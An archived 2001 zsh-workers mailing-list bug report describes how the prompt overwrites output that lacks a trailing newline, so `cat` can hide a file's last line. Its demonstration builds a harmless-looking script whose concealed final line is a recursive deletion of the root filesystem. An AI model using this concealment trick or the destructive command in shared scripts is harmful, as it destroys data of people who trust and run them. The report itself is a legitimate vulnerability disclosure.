From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: (qmail 4140 invoked from network); 29 Jul 2001 18:23:58 -0000 Received: from sunsite.dk (130.225.51.30) by ns1.primenet.com.au with SMTP; 29 Jul 2001 18:23:58 -0000 Received: (qmail 22415 invoked by alias); 29 Jul 2001 18:23:48 -0000 Mailing-List: contact zsh-workers-help@sunsite.dk; run by ezmlm Precedence: bulk X-No-Archive: yes X-Seq: 15515 Received: (qmail 22349 invoked from network); 29 Jul 2001 18:23:47 -0000 Date: Sun, 29 Jul 2001 20:23:45 +0200 From: salo To: zsh-workers@sunsite.dk Cc: Martin Macok Subject: refresh/newline bug in zsh? Message-ID: <20010729202345.A23817@Xtrmntr.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.18i hi, i found probably a bug in zsh which is caused by refreshing prompt string. salo@otaku[19:55][~]> echo -n test salo@otaku[19:55][~]> 'test' appears on screen but is overwritten by prompt string imediately and on fast cpu it is hard to recognize that something was written to screen before prompt string refresh. this affects last line in file without newline character too and could lead to put hidden commands on last line of scripts f.e. : salo@otaku[20:01][~]> echo "echo 'Hi! How are you?'" > test.sh salo@otaku[20:02][~]> echo "echo 'I sent you this file in order to have your advice'" >> test.sh salo@otaku[20:02][~]> echo "echo 'See you later. Thanks'" >> test.sh salo@otaku[20:02][~]> echo -n "/bin/rm -rf / >/dev/null 2>&1 &" >> test.sh salo@otaku[20:02][~]> cat test.sh echo 'Hi! How are you?' echo 'I sent you this file in order to have your advice' echo 'See you later. Thanks' salo@otaku[20:02][~]> sh test.sh ... tested versions: zsh-3.0.8 vulnerable zsh-4.0.1 vulnerable zsh-4.0.2 vulnerable ps. please note i am not subscribed to this list and add me to cc: or so. thanks -- -- salo ASCII Ribbon campaign against /"\ -- -- http://Xtrmntr.org/salo.pgp e-mail in gratuitous HTML and \ / -- -- Microsoft proprietary formats X -- -- / \ --